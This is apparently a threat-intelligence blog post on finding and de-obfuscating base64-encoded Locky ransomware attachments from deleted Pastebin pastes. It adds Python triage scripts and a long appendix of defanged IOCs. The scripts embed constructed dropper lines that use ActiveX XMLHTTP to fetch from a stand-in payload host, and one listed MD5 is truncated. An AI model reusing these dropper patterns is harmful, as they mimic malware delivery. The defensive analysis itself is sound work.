Hunting Ransomware Email Lures With Recorded Future

January 10, 2017 • Glenn Wong

Learn how to find and analyze base64-encoded Locky attachments in Pastebin.

Summary

In this blog post we describe a hunting methodology to find and analyze base64-encoded malware (Locky installer) sent as an attachment in phishing emails found on Pastebin. This methodology leverages Recorded Future’s API and integrations with OMNI Intelligence Partners, and can be easily customized to suit your organization’s priorities and established hunting approaches.

The methodology is as follows:

  1. Identify recently deleted Pastebin entries (emails) that have base64-encoded attachments.
  2. Decode attachment text (e.g., using a tool such as CyberChef).
  3. Unzip the resulting ZIP file.
  4. Utilize a few simple techniques to make IOCs (indicators of compromise) readable as clear text in the obfuscated JavaScript code found in the unzipped .wsf or .js file.
  5. Look up IOCs in Recorded Future to gain quick insight on nature of malware threat.

This technique can also be used to examine suspicious inbound email attachments, and serves as a useful general approach for both mature security teams with dedicated threat intelligence personnel and smaller teams looking for ways to boost their capabilities.

Methodology Details

To identify suspicious emails with base64-encoded attachments, we set up a process using Recorded Future’s API to identify deleted pastes that contain “base64 encoding” references (Recorded Future customers can get more details on the approach via this community support page). The API query targeted a specific set of pastes based on timing and keyword criteria, and a subsequent HEAD request to Pastebin checked whether the paste was still available.

Pastebin Reference

Example reference to deleted Pastebin entries containing base64-encoded information.

In the last few weeks, this process has yielded information on seven different email pastes (the IOCs for each are listed in Appendix 2).

Although the pastes have been deleted on Pastebin, Recorded Future users can obtain cached versions of the entries, including the base64-encoded attachment.

Cached Pastebin Entry

Cached entry from Pastebin, including the base64-encoded attachment.

Copying and pasting this text to a tool such as CyberChef reveals that this is indeed a ZIP file (note the “PK” prefix in the decoded text, which is the magic number or file signature for a ZIP file; “PK” are also the initials of Phil Katz, the co-creator of the ZIP file format).

Decoded Attachment in CyberChef

Decoded attachment (in CyberChef) showing “PK” prefix indicating this is a ZIP file.

This file can be unzipped within CyberChef, revealing a Windows scripting file (.wsf) or JavaScript file (.js) in the most recent examples.
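Steps 1 to 3 of the methodology (the HEAD check on the paste URL, the base64 decode with the “PK” signature check, and the in-memory unzip) can be scripted for bulk triage. The following is an added example written for this post; it is not Recorded Future’s code and does not use their API or CyberChef. The email paste and the ZIP inside it are constructed by the script itself (the `payload-host.example` host and the `invoice_scan.js` name are stand-ins, not indicators from the post), so it runs offline; nothing it extracts is executed.

```python
"""Decode and unzip a base64 email attachment recovered from a paste.

Added example for this post; not Recorded Future's code. The paste and the ZIP
inside it are constructed below so the script runs offline. Nothing is executed.
"""
import base64
import hashlib
import io
import re
import urllib.error
import urllib.request
import zipfile

ZIP_MAGIC = b"PK\x03\x04"  # local-file-header signature: the "PK" CyberChef shows

# Constructed stand-in for the dropper script found inside a real attachment.
# The host is a reserved example name, not an indicator from the post.
SAMPLE_SCRIPT = (
    'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
    'x.open("GET", "http://payload-host.example/counter", false);\n'
)
BASE64_LINE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def build_sample_paste() -> str:
    """Build a fake email paste whose attachment is a base64-encoded ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice_scan.js", SAMPLE_SCRIPT)
    b64 = base64.b64encode(buf.getvalue()).decode("ascii")
    # Wrap at 76 columns as MIME does, so the extractor has to rejoin lines.
    body = "\n".join(b64[i:i + 76] for i in range(0, len(b64), 76))
    return (
        "From: accounts@sender.example\n"
        "Subject: Invoice\n"
        "Content-Type: application/zip; name=invoice_scan.zip\n"
        "Content-Transfer-Encoding: base64\n\n" + body + "\n"
    )


def http_head_status(url: str) -> int:
    """HEAD request to the paste URL; returns the status even for 4xx/5xx."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def paste_still_available(url: str, head=http_head_status) -> bool:
    """Step 1: a 200 means the paste is still up; anything else, treat as deleted.
    `head` is injectable so the check can be exercised without network access."""
    return head(url) == 200


def extract_base64_block(paste: str) -> str:
    """Return the longest run of consecutive base64-only lines, joined."""
    best, current = [], []
    for line in paste.splitlines() + [""]:  # sentinel flushes the last run
        line = line.strip()
        if line and BASE64_LINE.match(line):
            current.append(line)
            continue
        if len("".join(current)) > len("".join(best)):
            best = current
        current = []
    joined = "".join(best)
    if len(joined) < 64:
        raise ValueError("no base64 attachment body found in paste")
    return joined


def decode_attachment(paste: str) -> bytes:
    """Step 2: base64-decode and confirm the ZIP signature before going further."""
    raw = base64.b64decode(extract_base64_block(paste), validate=True)
    if not raw.startswith(ZIP_MAGIC):
        raise ValueError("decoded attachment is not a ZIP archive (no PK signature)")
    return raw


def triage_attachment(paste: str) -> dict:
    """Step 3: unzip in memory and hash the archive and every member.
    Bytes are only read and hashed; nothing is written to disk or run."""
    raw = decode_attachment(paste)
    report = {"zip_md5": hashlib.md5(raw).hexdigest(), "members": []}
    with zipfile.ZipFile(io.BytesIO(raw)) as zf:
        for info in zf.infolist():
            data = zf.read(info.filename)
            report["members"].append({
                "name": info.filename,
                "size": info.file_size,
                "md5": hashlib.md5(data).hexdigest(),
                # Script members (.wsf/.js in the post) are the ones to de-obfuscate next.
                "script": info.filename.lower().endswith((".js", ".jse", ".wsf", ".vbs")),
            })
    return report


if __name__ == "__main__":
    print(triage_attachment(build_sample_paste()))
```

The report carries two MD5 values per paste, one for the archive and one for the member, which matches how the hashes in Appendix 2 are listed. The signature check is the scripted equivalent of spotting the “PK” prefix in CyberChef: if it fails, the paste is not a ZIP attachment and is dropped before any unzip is attempted.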

Unzipped .wsf File

Unzipped .wsf file from the attachment found on Pastebin.

Unzipped .js File

Unzipped .js file from the attachment found on Pastebin.

The unzipped file shows obfuscated JavaScript; fortunately these examples used relatively simple obfuscation approaches. Details on how they were made readable are included in the appendix.

Obfuscated JavaScript in the Unzipped File

Obfuscated JavaScript in the unzipped file “~_XASO0T_~.js”.

De-Obfuscated JavaScript Code

Example of de-obfuscated JavaScript code, showing ActiveXObjects and specific domains included in the malware.
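Step 4, turning the obfuscated script into readable IOCs, is shown here as an added example, not the post’s CyberChef recipe and not code from the actual sample. The post only says the obfuscation was “relatively simple”, so this script assumes two common tricks (string literals split into `"a" + "b"` concatenations and `String.fromCharCode` sequences) and folds them, then pulls out the ActiveXObject names and contacted hosts and defangs the hosts the way Appendix 2 does. The obfuscated JavaScript below is constructed; the `*.example` hosts are stand-ins, not indicators from the post.

```python
"""Fold simple JavaScript string obfuscation and extract IOCs.

Added example for this post. The sample script and the two obfuscation tricks
it uses are assumptions; the real "~_XASO0T_~.js" is not reproduced here.
"""
import re

# Constructed obfuscated sample (assumption about the real dropper's tricks).
OBFUSCATED_JS = r'''
var _0x1a = "MSX" + "ML2" + ".XML" + "HTTP";
var _0x2b = String.fromCharCode(104, 116, 116, 112, 58, 47, 47);
var _0x3c = new ActiveXObject(_0x1a);
var _0x4d = new ActiveXObject("WScr" + "ipt.Sh" + "ell");
var _0x5e = new ActiveXObject("ADO" + "DB.St" + "ream");
_0x3c.open("GET", _0x2b + "payload-host" + ".example" + "/counter", false);
_0x3c.open("GET", _0x2b + "www." + "second-host" + ".example" + "/x", false);
'''

FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
STR_CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
STR_VAR = re.compile(r'\bvar\s+([A-Za-z_$][\w$]*)\s*=\s*"([^"\\]*)"\s*;')
ACTIVEX = re.compile(r'ActiveXObject\(\s*"([^"]+)"\s*\)')
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def fold_char_codes(js: str) -> str:
    """Replace String.fromCharCode(104, 116, ...) with the literal it builds."""
    def repl(m):
        return '"' + "".join(chr(int(n)) for n in m.group(1).split(",")) + '"'
    return FROM_CHAR_CODE.sub(repl, js)


def fold_concat(js: str) -> str:
    """Merge "a" + "b" into "ab", repeating until the text stops changing."""
    while True:
        new = STR_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
        if new == js:
            return js
        js = new


def inline_string_vars(js: str) -> str:
    """Substitute variables that hold one string literal and drop the declaration."""
    while True:
        m = STR_VAR.search(js)
        if not m:
            return js
        name, value = m.group(1), m.group(2)
        js = js[:m.start()] + js[m.end():]
        js = re.sub(r"(?<![\w$])" + re.escape(name) + r"(?![\w$])", '"' + value + '"', js)


def deobfuscate(js: str) -> str:
    """Pipeline: char codes -> concatenations -> variable inlining -> concatenations."""
    return fold_concat(inline_string_vars(fold_concat(fold_char_codes(js))))


def defang(indicator: str) -> str:
    """Make a host safe to paste into a report, as Appendix 2 does: a[.]b"""
    return indicator.replace(".", "[.]")


def extract_iocs(clear_js: str) -> dict:
    """Pull ActiveXObject names and contacted hosts out of readable script text."""
    objects = sorted(set(ACTIVEX.findall(clear_js)))
    hosts = sorted(set(URL_HOST.findall(clear_js)))
    return {"activex": objects, "domains": hosts, "defanged": [defang(h) for h in hosts]}


if __name__ == "__main__":
    clear = deobfuscate(OBFUSCATED_JS)
    print(clear)
    print(extract_iocs(clear))
```

Each pass is a plain text rewrite, so the script is never evaluated; if a sample uses tricks beyond these two (array-index lookups, custom decode functions), the folds leave that text alone and the extraction returns less, which is the cue to fall back to a sandbox or a manual CyberChef recipe.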

Looking up the IOCs in Recorded Future can provide very quick context to the nature of this malware; although there are very few references to this domain, the dynamoo blog does note that the domain happyfeet.de (and others found in this .js file) are associated with Locky.

Overview of Domain Intel Card

Recent References on Domain Intel Card

Domain Intel Card for happyfeet.de, one of the IOCs found in the “~_XASO0T_~.js” file.

Additional context, with even clearer verdicts, is easily obtained in two clicks by utilizing our OMNI Intelligence Partners, DomainTools and PhishMe. Through these extensions, we quickly discover that the domain is blacklisted and carries DomainTools’s highest risk score, while PhishMe has positively identified the domain as part of an email campaign that installs Locky on the computers of unsuspecting victims who have opened the attached ZIP file.

DomainTool Lookup

DomainTools lookup in the Domain Intel Card for happyfeet.de.

PhishMe Lookup

PhishMe lookup in the Domain Intel Card for happyfeet.de.

Conclusion

We have demonstrated a straightforward approach to find and analyze base64-encoded attachments in suspicious emails. By utilizing Recorded Future and its OMNI Intelligence Partners, the nature of the attack and related risks can be quickly discerned, giving security teams more advanced threat warnings (if hunting with external information, such as the Pastebin entries described herein) and faster time to remediation (if reviewing inbound email traffic).


Appendix 1

CyberChef Recipe used to de-obfuscate the JavaScript in the above example:

CyberChef Recipe

Appendix 2

IOCs of seven suspicious emails identified through recent deleted Pastebin entries with base64-encoded attachments.

Notes

  • The MD5 hashes represent both the ZIP archive and the unzipped .wsf or .js files.
  • ActiveXObjects and domains were found directly within the obfuscated JavaScript.
  • IP Addresses associated with domains were obtained via Farsight pDNS data.

December 14: http://pastebin.com/eJvDV5LK

MD5 Hashes

  • 5ddd66be23827d9eeb0434bb66016e82
  • 51604dc1d64a94ccbcc2d680f7376967

ActiveXObjects

  • ADODB.Stream
  • MSXML2.XMLHTTP
  • WScript.Shell
  • Scripting.FileSystemObject

Domains

  • thewebgroup[.]net
  • continentalprintingsupplies[.]com
  • netkeycompany[.]com
  • tobybender[.]com
  • buttonart[.]xyz

IP Addresses

  • 199[.]59[.]58[.]6
  • 66[.]175[.]58[.]9
  • 54[.]187[.]5[.]20
  • 64[.]34[.]157[.]60

AS Numbers

  • AS13354
  • AS30447
  • AS16509
  • AS13768

December 15: http://pastebin.com/qCGsBAiz

MD5 Hashes

  • 35f91ab294e0c646bca54feee0a5a2e1
  • 808214981e1fc374b9170e83b1ad2081

ActiveXObjects

  • ADODB.Stream
  • MSXML2.XMLHTTP
  • WScript.Shell
  • Scripting.FileSystemObject

Domains

  • hedefosgb[.]com
  • zhiyuw[.]com
  • bappeda[.]dharmasrayakab[.]go[.]id
  • viscarci[.]com
  • chinaxw[.]org

IP Addresses

  • 185[.]85[.]205[.]18
  • 120[.]210[.]204[.]33
  • 222[.]124[.]129[.]173
  • 120[.]39[.]243[.]225
  • 210[.]209[.]73[.]120

AS Numbers

  • AS201079
  • AS9808
  • AS17974
  • AS4134
  • AS17444

December 16: http://pastebin.com/LmCcGJMR

MD5 Hashes

  • 6d2fac2bd57abdf570ebcab772aab7ef
  • 30b22530fbd9d7df9409213d4f433fc2

ActiveXObjects

  • ADODB.Stream
  • MSXML2.XMLHTTP
  • WScript.Shell
  • Scripting.FileSystemObject

Domains

  • honestflooring[.]com
  • happyfeet[.]de
  • elevationmusic[.]de

IP Addresses

  • 43[.]241[.]73[.]185
  • 217[.]160[.]231[.]125
  • 46[.]252[.]16[.]148

AS Numbers

  • AS132056
  • AS8560
  • AS34011

December 22: http://pastebin.com/ge6WhPvJ

MD5 Hashes

  • 479ca1df2081ef67bbe159c1eaeb92bf
  • a0c5075996c9dd1eeddb5ef308ca9f0b

ActiveXObject

  • Msxml2.XMLHTTP

Domains

  • minebleue[.]com
  • offie[.]nl
  • www[.]pegamontsa[.]ro
  • chaitanyaimpex[.]org
  • break-first[.]com

IP Addresses

  • 213[.]186[.]33[.]87
  • 109[.]72[.]85[.]5
  • 194[.]102[.]200[.]35
  • 43[.]255[.]154[.]44
  • 87[.]98[.]144[.]123

AS Numbers

  • AS16276
  • AS48635
  • AS15882
  • AS26496
  • AS16276

December 22: http://pastebin.com/GW0DXfCR

MD5 Hashes

  • 6eab51108fdce736ead29e1746554b2a
  • 6482a984ca53e15e7216518f896720a4

ActiveXObject

  • Msxml2.XMLHTTP

Domains

  • megrelis-avocat[.]com
  • offie[.]nl
  • med-lex[.]com
  • mercadoatlantico[.]com[.]br
  • instalaciondeairesplit[.]com

IP Addresses

  • 213[.]186[.]33[.]82
  • 109[.]72[.]85[.]5
  • 213[.]186[.]33[.]17
  • 186[.]202[.]183[.]63
  • 181[.]88[.]192[.]158

AS Numbers

  • AS16276
  • AS48635
  • AS27715
  • AS7303

December 23: http://pastebin.com/VYFNEtGP

MD5 Hashes

  • 721f7206f7efe6de34c4aaba2c41a96
  • dd48ed2a616e750076d62cacf6ab6a24

ActiveXObject

  • Msxml2.XMLHTTP

Domains

  • sonja[.]ostrovanka[.]cz
  • break-first[.]com
  • mercadoatlantico[.]com[.]br
  • megrelis-avocat[.]com
  • minebleue[.]com

IP Addresses

  • 88[.]86[.]121[.]24
  • 87[.]98[.]144[.]123
  • 186[.]202[.]183[.]63
  • 213[.]186[.]33[.]82
  • 213[.]186[.]33[.]87

AS Numbers

  • AS39392
  • AS16276
  • AS27715
  • AS16276

December 23: http://pastebin.com/cjj96hsq

MD5 Hashes

  • 52725fa89cafae845431a6099ac8ca60
  • 7ea18a094dc2565ca1a4da697777aa1a

ActiveXObject

  • Msxml2.XMLHTTP

Domains

  • chaitanyaimpex[.]org
  • break-first[.]com
  • sonja[.]ostrovanka[.]cz
  • mercadoatlantico[.]com[.]br
  • med-lex[.]com

IP Addresses

  • 43[.]255[.]154[.]44
  • 87[.]98[.]144[.]123
  • 88[.]86[.]121[.]24
  • 186[.]202[.]183[.]63
  • 213[.]186[.]33[.]17

AS Numbers

  • AS26496
  • AS16276
  • AS39392
  • AS27715
  • AS16276